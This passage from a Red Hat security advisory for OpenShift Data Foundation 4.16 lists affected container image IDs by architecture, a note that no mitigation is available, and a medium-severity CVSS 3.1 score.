to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", 